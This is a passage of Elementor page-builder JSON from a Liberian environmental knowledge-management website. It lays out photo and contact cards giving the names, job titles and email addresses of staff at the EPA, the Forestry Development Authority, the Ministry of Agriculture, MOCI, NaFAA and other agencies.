\\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a 